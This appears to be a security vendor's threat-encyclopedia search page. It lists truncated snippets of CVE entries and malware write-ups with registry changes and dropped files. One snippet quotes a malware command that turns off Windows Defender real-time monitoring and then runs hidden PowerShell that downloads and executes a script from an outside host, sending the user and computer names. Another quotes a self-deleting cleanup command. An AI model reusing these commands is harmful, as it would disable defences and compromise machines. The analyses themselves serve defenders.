Search
Keyword: htmlbagleq1
CVE-2010-1812 Use-after-free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a
This spyware may be dropped by other malware. It modifies the affected system's HOSTS files. This prevents users from accessing certain websites. It attempts to steal sensitive online banking
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This potentially unwanted application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be manually installed
following registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\PCSpeedupPro.net\ PC Speedup-Pro TELNO = "(855)-332-0124" HKEY_LOCAL_MACHINE\SOFTWARE\PCSpeedupPro.net\ PC Speedup-Pro ISTELNO = "1" HKEY_LOCAL_MACHINE
System Modifications This Ransomware adds the following registry entries: HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion SysHelper = "1" Dropping Routine This Ransomware drops the following
Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.tr2q.com/mail.jsp?js*{computer username}*{computer name}*''+[Environment
\ImgBurn VersionBuild = "0" HKEY_CURRENT_USER\Software\ImgBurn INSTALLER_StartMenuShortcuts = "1" HKEY_CURRENT_USER\Software\ImgBurn INSTALLER_DesktopIcon = "1" HKEY_CURRENT_USER\Software\ImgBurn
CVE-2012-2122 sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x
"Apartment" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ ToolboxBitmap32 (Default) = "%System%\mshtmled.dll, 1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ MiscStatus
"Apartment" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ ToolboxBitmap32 (Default) = "%System%\mshtmled.dll, 1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ MiscStatus
%Application Data%\tyrbvfecd.exe" tyrbvfecd.exe rfdeevtbc.exe %System%\cmd.exe /c rd /s /q %All Users Profile%\CfMqilATTbA3Z & timeout 1 & del /f /q "%Application Data%\edtbgvfcd.exe" %System%\lsass.exe %System%
HKEY_CURRENT_USER\Software\Headlight\ GetRightToGo\CustomizedApps 1ae33d5bb6432da3b026aa1f1f9161b88fb00d9f = "1" HKEY_CURRENT_USER\Software\Headlight\ GetRightToGo\SharedConfig BusyPause = "15" HKEY_CURRENT_USER
\SystemCertificates\TrustedPublisher\ CTLs It adds the following registry entries: HKEY_CURRENT_USER\Control Panel\International hTimes = "1" HKEY_CURRENT_USER\Control Panel\International nTimes = "66
{62f49e10-6c37-11d1-864c-14a300000000}" HKEY_LOCAL_MACHINE\SOFTWARE\Policies\ Microsoft\Windows\IPSec\ Policy\Local\{random key} ipsecDataType = "1" HKEY_LOCAL_MACHINE\SOFTWARE\Policies\ Microsoft\Windows\IPSec\ Policy\Local\{random key
\ Microsoft\Windows\IPSec\ Policy\Local\{random key} ipsecDataType = "1" HKEY_LOCAL_MACHINE\SOFTWARE\Policies\ Microsoft\Windows\IPSec\ Policy\Local\{random key} ipsecData = "{random values}" HKEY_LOCAL_MACHINE
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
IEDefaultSearch = 1 HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\ BaiduToolbar idtmp = "haoaoao_cb" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Uninstall\ BaiduBarX DisplayName = "?????" HKEY_LOCAL_MACHINE
" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\International W2KLpk = "0" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\International\CpMRU Enable = "1" HKEY_CURRENT_USER\Software\Microsoft
\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Winlogon\ Notify\dfedcebbba Asynchronous = "1" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Winlogon\ Notify\dfedcebbba StartShell =